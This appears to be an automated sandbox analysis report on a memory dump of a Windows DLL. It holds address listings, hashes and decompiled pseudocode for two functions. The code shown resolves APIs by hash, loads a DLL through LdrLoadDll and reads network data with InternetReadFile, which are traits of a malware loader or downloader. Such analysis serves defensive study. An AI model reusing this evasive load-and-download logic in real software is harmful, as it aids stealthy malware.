0x6ea042c0
0x6ea042c0
0x6ea042c6
0x6ea042c6
0x6ea042cc
0x00000000
0x6ea042a5
0x6ea042a3
0x6ea0429b
0x6ea04289
0x6ea0457a
0x00000000
0x6ea0457a
0x00000000
0x6ea04226
0x6ea04226
0x6ea0422c
0x6ea0422c
0x6ea04232
0x00000000
0x6ea0420b
0x6ea04209
0x6ea0402a
0x6ea04032
0x6ea0403b
0x6ea0403b
0x00000000
0x6ea04032
0x6ea03f6d
0x6ea03f75
0x6ea03f82
0x6ea03f82
0x6ea04040
0x6ea04040
0x6ea04042
0x6ea04047
0x00000000
0x6ea04047
0x6ea03e8f
0x6ea03e8f
0x6ea03e94
0x6ea03e9c
0x6ea03eae
0x6ea03ebc
0x6ea03eb0
0x6ea03eb0
0x6ea03eb0
0x6ea03e9e
0x6ea03e9e
0x6ea03e9e
0x6ea0404a
0x6ea0404a
0x6ea04056
0x6ea041cf
0x00000000
0x6ea0405c
0x6ea0405e
0x6ea0408b
0x6ea04090
0x6ea04096
0x6ea0409a
0x6ea041a6
0x6ea041b1
0x6ea041b7
0x6ea041b7
0x6ea041a6
0x6ea040a2
0x6ea040ab
0x6ea040b3
0x00000000
0x6ea040b3
0x6ea04060
0x6ea04060
0x6ea04060
0x6ea04062
0x6ea04064
0x6ea04072
0x6ea04073
0x6ea04079
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea04079
0x6ea041be
0x6ea041c4
0x6ea040b5
0x6ea040b7
0x6ea040c1
0x6ea040c1
0x6ea041ca
0x00000000
0x6ea041ca
0x00000000
0x6ea0407b
0x6ea0407b
0x6ea04081
0x6ea04081
0x6ea04087
0x00000000
0x6ea04060
0x6ea0405e
0x6ea040c3
0x6ea040c3
0x6ea040eb
0x6ea040ef
0x6ea040f2
0x6ea040f5
0x6ea040f8
0x6ea04107
0x6ea04107
0x6ea039f9
0x6ea039f9
0x6ea039fa
0x6ea039fb
0x6ea039fb
0x6ea04778
0x00000000
0x6ea04778
0x00000000
0x6ea039bd
0x6ea039bd
0x6ea039c3
0x6ea039c3
0x6ea039c9
0x6ea039cd
0x6ea039d2
0x6ea039d8
0x6ea039dc
0x6ea04754
0x6ea0475f
0x6ea04765
0x6ea04765
0x6ea04754
0x6ea039e4
0x00000000
0x6ea039e6
0x6ea039ed
0x6ea039f0
0x00000000
0x6ea039f0
0x6ea039e4
0x6ea0399a
0x6ea0395d
0x6ea03969
0x6ea03969
0x00000000

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaf53b30cff543f79a0145b7184e77b52c28f336cfa9ac1e16638003dbb6a694
Instruction ID: f4aab3188e44392a209106b2838b8edb53acfd9aa0ece2ac1cbba7f4881bef42
Opcode Fuzzy Hash: eaf53b30cff543f79a0145b7184e77b52c28f336cfa9ac1e16638003dbb6a694
Instruction Fuzzy Hash: CC520B307083428BD7648B99E9A4BDA77A97FD130CF188A2CD4945B395DB34DCCAC789

Uniqueness

Uniqueness Score: -1.00%

Function 6EA06C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6EA06C50(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t135;
				intOrPtr _t138;
				void* _t143;
				void* _t147;
				void* _t151;
				struct _OBJDIR_INFORMATION _t164;
				void* _t170;
				intOrPtr _t183;
				struct _OBJDIR_INFORMATION _t197;
				struct _OBJDIR_INFORMATION _t206;
				long _t212;
				void* _t215;
				intOrPtr _t246;
				signed int _t278;
				signed int _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t291;
				void* _t340;
				struct _OBJDIR_INFORMATION _t342;
				intOrPtr _t345;
				struct _OBJDIR_INFORMATION _t363;
				intOrPtr _t366;
				struct _OBJDIR_INFORMATION _t382;
				struct _OBJDIR_INFORMATION _t389;
				struct _OBJDIR_INFORMATION _t390;
				struct _OBJDIR_INFORMATION _t391;
				intOrPtr* _t394;
				void* _t395;
				intOrPtr* _t397;
				void* _t398;
				void* _t399;
				void* _t401;
				void* _t402;
				void* _t404;
				void* _t405;
				void* _t406;
				short* _t407;
				void* _t408;
				void* _t410;
				void* _t411;
				intOrPtr _t412;
				intOrPtr* _t413;
				short* _t418;
				void* _t420;
				void* _t421;
				intOrPtr* _t422;
				void* _t424;
				void* _t425;
				struct _OBJDIR_INFORMATION* _t426;

				_t278 = __ecx;
				E6EA08810(_t426 + 0x2c8, 0);
				E6EA08810(_t426 + 0x2d0, 0);
				_t135 = E6EA03930(__ecx, 0, _t399, _t406); // executed
				_t412 =  *0x6ea2b208;
				if( *((char*)(_t135 + 0xb)) == 0x40) {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t413 = E6EA01030();
						_t426 = _t426 + 4;
						if(_t413 == 0) {
							_t413 = 0;
						} else {
							_t122 = _t413 + 8; // 0x8
							 *_t413 = 0;
							 *((intOrPtr*)(_t413 + 4)) = 0;
							E6EA08810(_t122, 0);
							_t124 = _t413 + 0x10; // 0x10
							E6EA08810(_t124, 0);
							_t125 = _t413 + 0x18; // 0x18
							E6EA08810(_t125, 0);
							_t126 = _t413 + 0x20; // 0x20
							E6EA08810(_t126, 0);
							_t127 = _t413 + 0x28; // 0x28
							E6EA08810(_t127, 0);
							_t128 = _t413 + 0x30; // 0x30
							E6EA08810(_t128, 0);
							_t129 = _t413 + 0x38; // 0x38
							E6EA08810(_t129, 0);
							_t130 = _t413 + 0x40; // 0x40
							E6EA08810(_t130, 0);
							_t131 = _t413 + 0x48; // 0x48
							E6EA08810(_t131, 0);
							_t410 = 6;
							_t132 = _t413 + 0x50; // 0x50
							_t404 = _t132;
							do {
								E6EA08810(_t404, 0);
								_t404 = _t404 + 8;
								_t410 = _t410 - 1;
							} while (_t410 != 0);
						}
						 *0x6ea2b208 = _t413;
					}
					if(L6EA09DC0(_t413 + 0x38) != 0) {
						E6EA08810(_t426 + 0x26c, 0x80);
						_t342 =  *0x6ea2b1f4; // 0xba1340
						if(_t342 == 0xc139578) {
							 *0x6ea2b1f4 = 0;
							goto L86;
						} else {
							if(_t342 == 0) {
								L86:
								_push(0xa1310f65);
								_t420 = L6EA07564(0xa1310f65);
								if(_t420 == 0) {
									if(E6EA06C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t420 = L6EA07564(0xa1310f65);
									}
								}
								if(_t420 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t394 = E6EA067C8(_t420, 0x7c2e142f);
									goto L89;
								}
							} else {
								do {
									_t421 = 0;
									_t395 = 0;
									while( *((intOrPtr*)(_t395 + _t342 + 8)) != 0x7c2e142f) {
										_t421 = _t421 + 1;
										_t395 = _t395 + 0x18;
										if(_t421 < 0x10) {
											continue;
										} else {
											goto L85;
										}
										goto L91;
									}
									_t394 =  *((intOrPtr*)(_t395 + _t342 + 0x14));
									if(_t394 != 0) {
										L89:
										if(_t394 != 0) {
											 *_t394( *(_t426 + 0x26c),  *(_t426 + 0x26c) >> 1);
										}
									} else {
										goto L86;
									}
									goto L91;
									L85:
									asm("o16 nop [eax+eax]");
									_t109 = _t342 + 0x180; // 0xba8e68
									_t342 =  *_t109;
								} while (_t342 != 0);
								goto L86;
							}
						}
						L91:
						if(( *(L6EA09DE0(_t426 + 0x268)) & 0x0000ffff) != 0x5c) {
							E6EA096D0(_t426 + 0x26c, 0x5c);
						}
						_t345 =  *0x6ea2b208; // 0xba73e0
						E6EA08CC0(_t345 + 0x38,  *((intOrPtr*)(_t426 + 0x268)));
						E6EA08CA0(_t426 + 0x268);
					}
					_t138 =  *0x6ea2b208; // 0xba73e0
					E6EA088C0(_t426 + 0x274, _t138 + 0x38);
					E6EA08CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x270)));
					_t291 = _t426 + 0x270;
				} else {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t422 = E6EA01030();
						_t426 = _t426 + 4;
						if(_t422 == 0) {
							_t422 = 0;
						} else {
							_t95 = _t422 + 8; // 0x8
							 *_t422 = 0;
							 *((intOrPtr*)(_t422 + 4)) = 0;
							E6EA08810(_t95, 0);
							_t97 = _t422 + 0x10; // 0x10
							E6EA08810(_t97, 0);
							_t98 = _t422 + 0x18; // 0x18
							E6EA08810(_t98, 0);
							_t99 = _t422 + 0x20; // 0x20
							E6EA08810(_t99, 0);
							_t100 = _t422 + 0x28; // 0x28
							E6EA08810(_t100, 0);
							_t101 = _t422 + 0x30; // 0x30
							E6EA08810(_t101, 0);
							_t102 = _t422 + 0x38; // 0x38
							E6EA08810(_t102, 0);
							_t103 = _t422 + 0x40; // 0x40
							E6EA08810(_t103, 0);
							_t104 = _t422 + 0x48; // 0x48
							E6EA08810(_t104, 0);
							_t411 = 6;
							_t105 = _t422 + 0x50; // 0x50
							_t405 = _t105;
							do {
								E6EA08810(_t405, 0);
								_t405 = _t405 + 8;
								_t411 = _t411 - 1;
							} while (_t411 != 0);
						}
						 *0x6ea2b208 = _t422;
					}
					if(L6EA09DC0(_t422 + 0x30) != 0) {
						E6EA08810(_t426 + 0x27c, 0x80);
						_t363 =  *0x6ea2b1f4; // 0xba1340
						if(_t363 == 0xc139578) {
							 *0x6ea2b1f4 = 0;
							goto L10;
						} else {
							if(_t363 == 0) {
								L10:
								_push(0xa1310f65);
								_t424 = L6EA07564(0xa1310f65);
								if(_t424 == 0) {
									if(E6EA06C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t424 = L6EA07564(0xa1310f65);
									}
								}
								if(_t424 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t397 = E6EA067C8(_t424, 0x4ade4070);
									goto L13;
								}
							} else {
								do {
									_t425 = 0;
									_t398 = 0;
									while( *((intOrPtr*)(_t398 + _t363 + 8)) != 0x4ade4070) {
										_t425 = _t425 + 1;
										_t398 = _t398 + 0x18;
										if(_t425 < 0x10) {
											continue;
										} else {
											goto L9;
										}
										goto L15;
									}
									_t397 =  *((intOrPtr*)(_t398 + _t363 + 0x14));
									if(_t397 != 0) {
										L13:
										if(_t397 != 0) {
											 *_t397( *(_t426 + 0x27c),  *(_t426 + 0x27c) >> 1);
										}
										goto L15;
									} else {
										goto L10;
									}
									L106:
									L9:
									asm("o16 nop [eax+eax]");
									_t7 = _t363 + 0x180; // 0xba8e68
									_t363 =  *_t7;
								} while (_t363 != 0);
								goto L10;
							}
						}
						L15:
						if(( *(L6EA09DE0(_t426 + 0x278)) & 0x0000ffff) != 0x5c) {
							E6EA096D0(_t426 + 0x27c, 0x5c);
						}
						_t366 =  *0x6ea2b208; // 0xba73e0
						E6EA08CC0(_t366 + 0x30,  *((intOrPtr*)(_t426 + 0x278)));
						E6EA08CA0(_t426 + 0x278);
					}
					_t246 =  *0x6ea2b208; // 0xba73e0
					E6EA088C0(_t426 + 0x2c0, _t246 + 0x30);
					E6EA08CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x2bc)));
					_t291 = _t426 + 0x2bc;
				}
				E6EA08CA0(_t291);
				_t143 = E6EA10220(_t426 + 0x2d4,  *((intOrPtr*)(_t426 + 0x2c8)), 0);
				E6EA08810(_t426 + 0x2d8, 0x2800);
				_t407 =  *((intOrPtr*)(_t426 + 0x2d4));
				 *_t407 = 0;
				E6EA19470(_t426 + 0x2ac, 0x6ea2a1a0, 0x28);
				_t147 = E6EA19640(_t426 + 0x2a8, 0);
				E6EA1E780(_t278, _t147, E6EA19650(_t426 + 0x2a4));
				 *((intOrPtr*)(_t426 + 0x294)) = _t407;
				 *((char*)(_t426 + 0x290)) = 0;
				 *((intOrPtr*)(_t426 + 0x298)) = 0;
				 *((intOrPtr*)(_t426 + 0x29c)) = 2;
				 *((char*)(_t426 + 0x2a0)) = 1;
				_t151 = E6EA19640(_t426 + 0x2a8, 0);
				_push(_t426 + 0x290);
				_push(E6EA07CD0);
				_push(0);
				_push(0x7fffffff);
				_push(0x6ea2a1c8);
				L6EA1E5D0(_t151, 0x28, _t407);
				L6EA19510(_t426 + 0x2a4);
				E6EA10220(_t143,  *((intOrPtr*)(_t426 + 0x2d8)), 0);
				E6EA08CA0(_t426 + 0x2d4);
				 *_t426 = 0;
				 *(_t426 + 4) = 1;
				 *((intOrPtr*)(_t426 + 8)) = 0;
				 *((intOrPtr*)(_t426 + 0xc)) = 3;
				E6EA08AB0(_t426 + 0x18,  *((intOrPtr*)(_t426 + 0x2d0)), 0);
				_push(1);
				if(E6EA1CEA0(_t278, _t426 + 4, 0x28, _t143, _t407) == 0) {
					L53:
					E6EA08CA0(_t426 + 0x10);
					if( *(_t426 + 4) != 0) {
						_t382 =  *_t426;
						if(_t382 == 0 || _t382 == 0xffffffff) {
							_t164 = 1;
						} else {
							_t164 = 0;
						}
						if(_t164 == 0) {
							E6EA1CE70(_t382);
						}
					}
					 *_t426 = 0;
					E6EA08CA0(_t426 + 0x2cc);
					E6EA08CA0(_t426 + 0x2c4);
					return 0;
				} else {
					_t279 = _t278 ^ 0x38ba5c7b;
					_t408 = _t426 + 0x44;
					_t401 = _t426 + 0x2e8;
					while(1) {
						E6EA08AB0(_t426 + 0x2e8, _t408, 0);
						E6EA09E70(_t426 + 0x2e4, _t401);
						E6EA083B0(_t426 + 0x2f0);
						_t170 = E6EA1D620( *((intOrPtr*)(_t426 + 0x2f0)), E6EA16040( *((intOrPtr*)(_t426 + 0x2f0)), 0x7fffffff));
						E6EA10B10(_t426 + 0x2f0);
						if(_t279 == _t170) {
							break;
						}
						E6EA08CA0(_t401);
						E6EA08CA0(_t426 + 0x2e0);
						if(E6EA1D0E0(_t426) != 0) {
							continue;
						} else {
							goto L53;
						}
						goto L106;
					}
					E6EA08CA0(_t401);
					E6EA088C0(_t426 + 0x2b8, _t426 + 0x2c4);
					E6EA10220(_t426 + 0x2bc,  *((intOrPtr*)(_t426 + 0x2e4)), 0);
					_t409 =  *((intOrPtr*)(_t426 + 0x2b4));
					_push(E6EA10180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff,  *((intOrPtr*)(_t426 + 0x2b4))) + _t179 + 0xa);
					E6EA19350(_t426 + 0x284);
					_t418 = E6EA19640(_t426 + 0x284, 0);
					_t183 = E6EA19640(_t426 + 0x284, 8);
					_t402 = E6EA10180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff, _t409);
					 *((intOrPtr*)(_t418 + 4)) = _t183;
					 *_t418 = _t402 + _t402;
					 *((short*)(_t418 + 2)) = _t402 + _t402 + 2;
					E6EA101B0(_t183, _t409, _t402 + _t402 + 2, _t409, 0);
					_t389 =  *0x6ea2b1f4; // 0xba1340
					 *(_t426 + 0x2dc) = 0;
					if(_t389 == 0xc139578) {
						 *0x6ea2b1f4 = 0;
						goto L29;
					} else {
						if(_t389 == 0) {
							L29:
							_push(0x588ab3ea);
							_t281 = L6EA07564(0x588ab3ea);
							if(_t281 == 0) {
								if(E6EA06C50(0x588ab3ea) != 0) {
									_push(0x588ab3ea);
									_t281 = L6EA07564(0x588ab3ea);
								}
							}
							if(_t281 == 0) {
								goto L43;
							} else {
								_t426 = _t426 + 0xfffffff8;
								_t282 = E6EA067C8(_t281, 0x208c2589);
								goto L32;
							}
						} else {
							do {
								_t340 = 0;
								_t215 = 0;
								while( *((intOrPtr*)(_t215 + _t389 + 8)) != 0x208c2589) {
									_t340 = _t340 + 1;
									_t215 = _t215 + 0x18;
									if(_t340 < 0x10) {
										continue;
									} else {
										goto L28;
									}
									goto L106;
								}
								_t282 =  *((intOrPtr*)(_t215 + _t389 + 0x14));
								if(_t282 != 0) {
									L32:
									if(_t282 == 0) {
										L43:
										if( *(_t426 + 0x2dc) == 0) {
											goto L35;
										} else {
											goto L44;
										}
									} else {
										_t212 = LdrLoadDll(0, 0, E6EA19640(_t426 + 0x284, 0), _t426 + 0x2dc); // executed
										if( *(_t426 + 0x2dc) == 0 || _t212 != 0) {
											L35:
											L6EA19510(_t426 + 0x280);
											E6EA08CA0(_t426 + 0x2b4);
											E6EA08CA0(_t426 + 0x2e0);
											E6EA08CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t390 =  *_t426;
												if(_t390 == 0 || _t390 == 0xffffffff) {
													_t197 = 1;
												} else {
													_t197 = 0;
												}
												if(_t197 == 0) {
													E6EA1CE70(_t390);
												}
											}
											 *_t426 = 0;
											E6EA08CA0(_t426 + 0x2cc);
											E6EA08CA0(_t426 + 0x2c4);
											return 0;
										} else {
											L44:
											L6EA19510(_t426 + 0x280);
											E6EA08CA0(_t426 + 0x2b4);
											E6EA08CA0(_t426 + 0x2e0);
											E6EA08CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t391 =  *_t426;
												if(_t391 == 0 || _t391 == 0xffffffff) {
													_t206 = 1;
												} else {
													_t206 = 0;
												}
												if(_t206 == 0) {
													E6EA1CE70(_t391);
												}
											}
											 *_t426 = 0;
											E6EA08CA0(_t426 + 0x2cc);
											E6EA08CA0(_t426 + 0x2c4);
											return 1;
										}
									}
								} else {
									goto L29;
								}
								goto L106;
								L28:
								asm("o16 nop [eax+eax]");
								_t67 = _t389 + 0x180; // 0xba8e68
								_t389 =  *_t67;
							} while (_t389 != 0);
							goto L29;
						}
					}
				}
				goto L106;
			}

0x6ea06c5a
0x6ea06c65
0x6ea06c73
0x6ea06c7a
0x6ea06c7f
0x6ea06c89
0x6ea0735c
0x6ea074c4
0x6ea074ce
0x6ea074d0
0x6ea074d5
0x6ea07551
0x6ea074d7
0x6ea074d9
0x6ea074dd
0x6ea074e0
0x6ea074e3
0x6ea074ea
0x6ea074ed
0x6ea074f4
0x6ea074f7
0x6ea074fe
0x6ea07501
0x6ea07508
0x6ea0750b
0x6ea07512
0x6ea07515
0x6ea0751c
0x6ea0751f
0x6ea07526
0x6ea07529
0x6ea07530
0x6ea07533
0x6ea07538
0x6ea0753d
0x6ea0753d
0x6ea07540
0x6ea07544
0x6ea07549
0x6ea0754c
0x6ea0754c
0x6ea0754f
0x6ea07553
0x6ea07553
0x6ea0736e
0x6ea07380
0x6ea07385
0x6ea07391
0x6ea074b5
0x00000000
0x6ea07397
0x6ea07399
0x6ea073c8
0x6ea073cd
0x6ea073d3
0x6ea073d7
0x6ea0748c
0x6ea07497
0x6ea0749d
0x6ea0749d
0x6ea0748c
0x6ea073df
0x6ea073e8
0x6ea073f0
0x00000000
0x6ea073f0
0x6ea0739b
0x6ea0739d
0x6ea0739d
0x6ea0739f
0x6ea073a1
0x6ea073af
0x6ea073b0
0x6ea073b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea073b6
0x6ea074a4
0x6ea074aa
0x6ea073f2
0x6ea073f4
0x6ea07407
0x6ea07407
0x6ea074b0
0x00000000
0x6ea074b0
0x00000000
0x6ea073b8
0x6ea073b8
0x6ea073be
0x6ea073be
0x6ea073c4
0x00000000
0x6ea0739d
0x6ea07399
0x6ea07409
0x6ea0741b
0x6ea07426
0x6ea07426
0x6ea0742b
0x6ea0743b
0x6ea07447
0x6ea07447
0x6ea0744c
0x6ea0745c
0x6ea0746f
0x6ea07474
0x6ea06c8f
0x6ea06c95
0x6ea072bc
0x6ea072c6
0x6ea072c8
0x6ea072cd
0x6ea07349
0x6ea072cf
0x6ea072d1
0x6ea072d5
0x6ea072d8
0x6ea072db
0x6ea072e2
0x6ea072e5
0x6ea072ec
0x6ea072ef
0x6ea072f6
0x6ea072f9
0x6ea07300
0x6ea07303
0x6ea0730a
0x6ea0730d
0x6ea07314
0x6ea07317
0x6ea0731e
0x6ea07321
0x6ea07328
0x6ea0732b
0x6ea07330
0x6ea07335
0x6ea07335
0x6ea07338
0x6ea0733c
0x6ea07341
0x6ea07344
0x6ea07344
0x6ea07347
0x6ea0734b
0x6ea0734b
0x6ea06ca7
0x6ea06cb9
0x6ea06cbe
0x6ea06cca
0x6ea072ad
0x00000000
0x6ea06cd0
0x6ea06cd2
0x6ea06d01
0x6ea06d06
0x6ea06d0c
0x6ea06d10
0x6ea07284
0x6ea0728f
0x6ea07295
0x6ea07295
0x6ea07284
0x6ea06d18
0x6ea06d21
0x6ea06d29
0x00000000
0x6ea06d29
0x6ea06cd4
0x6ea06cd6
0x6ea06cd6
0x6ea06cd8
0x6ea06cda
0x6ea06ce8
0x6ea06ce9
0x6ea06cef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea06cef
0x6ea0729c
0x6ea072a2
0x6ea06d2b
0x6ea06d2d
0x6ea06d40
0x6ea06d40
0x00000000
0x6ea072a8
0x00000000
0x6ea072a8
0x00000000
0x6ea06cf1
0x6ea06cf1
0x6ea06cf7
0x6ea06cf7
0x6ea06cfd
0x00000000
0x6ea06cd6
0x6ea06cd2
0x6ea06d42
0x6ea06d54
0x6ea06d5f
0x6ea06d5f
0x6ea06d64
0x6ea06d74
0x6ea06d80
0x6ea06d80
0x6ea06d85
0x6ea06d95
0x6ea06da8
0x6ea06dad
0x6ea06dad
0x6ea06db4
0x6ea06dc9
0x6ea06ddc
0x6ea06de1
0x6ea06df1
0x6ea06dfb
0x6ea06e09
0x6ea06e20
0x6ea06e27
0x6ea06e2e
0x6ea06e35
0x6ea06e3c
0x6ea06e47
0x6ea06e57
0x6ea06e6a
0x6ea06e6b
0x6ea06e70
0x6ea06e72
0x6ea06e77
0x6ea06e7c
0x6ea06e88
0x6ea06e98
0x6ea06ea4
0x6ea06eab
0x6ea06eae
0x6ea06eb3
0x6ea06eb7
0x6ea06ecb
0x6ea06ed0
0x6ea06edd
0x6ea071d9
0x6ea071dd
0x6ea071e7
0x6ea071e9
0x6ea071ee
0x6ea071f9
0x6ea071f5
0x6ea071f5
0x6ea071f5
0x6ea07200
0x6ea07203
0x6ea07203
0x6ea07200
0x6ea07208
0x6ea07216
0x6ea07222
0x6ea07233
0x6ea06ee3
0x6ea06ee3
0x6ea06ee9
0x6ea06eed
0x6ea06ef4
0x6ea06efe
0x6ea06f0b
0x6ea06f1e
0x6ea06f3a
0x6ea06f48
0x6ea06f4f
0x00000000
0x00000000
0x6ea071b8
0x6ea071c4
0x6ea071d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea071d3
0x6ea06f57
0x6ea06f6b
0x6ea06f80
0x6ea06f85
0x6ea06f9c
0x6ea06fa4
0x6ea06fb7
0x6ea06fc2
0x6ea06fd5
0x6ea06fdd
0x6ea06fe3
0x6ea06feb
0x6ea06fef
0x6ea06ff4
0x6ea06ffa
0x6ea0700b
0x6ea07269
0x00000000
0x6ea07011
0x6ea07013
0x6ea07042
0x6ea07047
0x6ea0704d
0x6ea07051
0x6ea07240
0x6ea0724b
0x6ea07251
0x6ea07251
0x6ea07240
0x6ea07059
0x00000000
0x6ea0705f
0x6ea07066
0x6ea0706e
0x00000000
0x6ea0706e
0x6ea07015
0x6ea07017
0x6ea07017
0x6ea07019
0x6ea0701b
0x6ea07029
0x6ea0702a
0x6ea07030
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea07030
0x6ea07258
0x6ea0725e
0x6ea07070
0x6ea07072
0x6ea07126
0x6ea0712e
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea07078
0x6ea07093
0x6ea0709d
0x6ea070a7
0x6ea070ae
0x6ea070ba
0x6ea070c6
0x6ea070cf
0x6ea070d9
0x6ea070db
0x6ea070e0
0x6ea070eb
0x6ea070e7
0x6ea070e7
0x6ea070e7
0x6ea070f2
0x6ea070f5
0x6ea070f5
0x6ea070f2
0x6ea070fa
0x6ea07108
0x6ea07114
0x6ea07125
0x6ea07134
0x6ea07134
0x6ea0713b
0x6ea07147
0x6ea07153
0x6ea0715c
0x6ea07166
0x6ea07168
0x6ea0716d
0x6ea07178
0x6ea07174
0x6ea07174
0x6ea07174
0x6ea0717f
0x6ea07182
0x6ea07182
0x6ea0717f
0x6ea07187
0x6ea07195
0x6ea071a1
0x6ea071b5
0x6ea071b5
0x6ea0709d
0x6ea07264
0x00000000
0x6ea07264
0x00000000
0x6ea07032
0x6ea07032
0x6ea07038
0x6ea07038
0x6ea0703e
0x00000000
0x6ea07017
0x6ea07013
0x6ea0700b
0x00000000

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000000,?,00000000), ref: 6EA07093

Memory Dump Source

Source File: 00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000000.00000002.690389011.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690462400.000000006EA25000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.690472523.000000006EA2B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.690481387.000000006EA2C000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e8c027c405e6bf611c605ab2405f399b9fd07e830c870547b5a8a6c39d38370b
Instruction ID: 21b1be99151ca89a2d75cc572edc1e1a1c82be2e15a45def1aa05633cd077fbf
Opcode Fuzzy Hash: e8c027c405e6bf611c605ab2405f399b9fd07e830c870547b5a8a6c39d38370b
Instruction Fuzzy Hash: 9422C3302183419BD7A4EBA4EE94BEE73A8AF8034CF548D2CA455571D0EF7099C9C79E

Uniqueness

Uniqueness Score: -1.00%

Function 6EA239F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6EA239F9(void* __eax, signed int __ebx, void* __edi) {
				long _t42;
				void* _t60;
				long _t63;
				long _t64;
				void* _t79;
				void* _t81;
				signed int _t86;
				void* _t124;
				void* _t128;
				void* _t133;
				long* _t134;
				void* _t139;

				_t124 = __edi;
				_t86 = __ebx;
				if(__eax == 0) {
					_t42 = E6EA07F00();
					__eflags = _t42;
					if(_t42 != 0) {
						 *_t134 = _t42;
						E6EA08CA0(_t139 + 0x34);
						E6EA08CA0(_t139 + 0x44);
						goto L14;
					} else {
						goto L1;
					}
				} else {
					L1:
					E6EA083B0(_t139 + 0x2c);
					E6EA10B30(_t139 + 0x40,  *((intOrPtr*)(_t139 + 0x34)),  *((intOrPtr*)(_t139 + 0x2c)));
					E6EA10B10(_t139 + 0x2c);
					_t130 = _t139;
					E6EA150A0(_t139 + 0x44, _t139, 0x6ea29424);
					E6EA13B00(_t86, _t130);
					L6EA17560(_t130, _t124, _t130);
					 *((char*)( *((intOrPtr*)(E6EA17600(_t86, 0))))) = 0;
					_t143 = _t134[0xa] - 1;
					if(_t134[0xa] > 1) {
						 *(_t139 + 0xc) = _t134;
						_t128 = 1;
						_t133 = _t139 + 0x54;
						while(1) {
							_t79 = E6EA17600(_t86, _t128);
							_push(1);
							_push(0x6ea2a9e0);
							E6EA01BA0(_t143, _t133);
							_t81 = E6EA10ED0(_t79, _t128,  *((intOrPtr*)(_t139 + 0x54)));
							E6EA10B10(_t133);
							if(_t81 != 0) {
								break;
							}
							_t128 = _t128 + 1;
							if(_t128 <  *_t86) {
								continue;
							} else {
								_t134 =  *(_t139 + 0xc);
							}
							goto L6;
						}
						_t134 =  *(_t139 + 0xc);
						 *((char*)( *((intOrPtr*)(E6EA17600(_t86, _t128))))) = 0;
					}
					L6:
					E6EA13EC0(_t86);
					_push(0);
					E6EA19350(_t139 + 0x10);
					_push(0x2800);
					E6EA19350(_t139 + 0x20);
					while(1) {
						 *(_t139 + 0x5c) = 0;
						if(L6EA015C0(0xd27f045a, 0x547ac48e) == 0) {
							break;
						}
						_t60 = E6EA19640(_t139 + 0x20, 0);
						_t63 = InternetReadFile(_t134[4], _t60, E6EA19650(_t139 + 0x1c), _t139 + 0x5c); // executed
						__eflags = _t63;
						if(_t63 == 0) {
							_t64 = E6EA07F00();
							__eflags = _t64;
							if(_t64 != 0) {
								L9:
								 *_t134 = _t64;
								L6EA19510(_t139 + 0x1c);
								L6EA19510(_t139 + 0xc);
								E6EA08CA0(_t139 + 0x34);
								E6EA08CA0(_t139 + 0x44);
								L14:
								E6EA10B10(_t139 + 0x3c);
								_push(0);
								E6EA19350( *((intOrPtr*)(_t139 + 0x78)));
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								goto L11;
							}
						} else {
							L11:
							__eflags =  *(_t139 + 0x5c);
							if( *(_t139 + 0x5c) == 0) {
								_push(_t139 + 0xc);
								E6EA193D0( *((intOrPtr*)(_t139 + 0x78)));
								L6EA19510(_t139 + 0x1c);
								L6EA19510(_t139 + 0xc);
								E6EA08CA0(_t139 + 0x34);
								E6EA08CA0(_t139 + 0x44);
								E6EA10B10(_t139 + 0x3c);
								return  *((intOrPtr*)(_t139 + 0x74));
							} else {
								E6EA19710(_t139 + 0x14, E6EA19640(_t139 + 0x20, 0),  *(_t139 + 0x5c));
								continue;
							}
						}
						goto L22;
					}
					_t64 = 0x7f;
					goto L9;
				}
				L22:
			}

0x6ea239f9
0x6ea239f9
0x6ea239fb
0x6ea23c44
0x6ea23c49
0x6ea23c4b
0x6ea23b6d
0x6ea23b74
0x6ea23b7d
0x00000000
0x6ea23c51
0x00000000
0x6ea23c51
0x6ea23a01
0x6ea23a01
0x6ea23a09
0x6ea23a16
0x6ea23a1f
0x6ea23a24
0x6ea23a31
0x6ea23a39
0x6ea23a40
0x6ea23a50
0x6ea23a53
0x6ea23a57
0x6ea23a59
0x6ea23a5d
0x6ea23a62
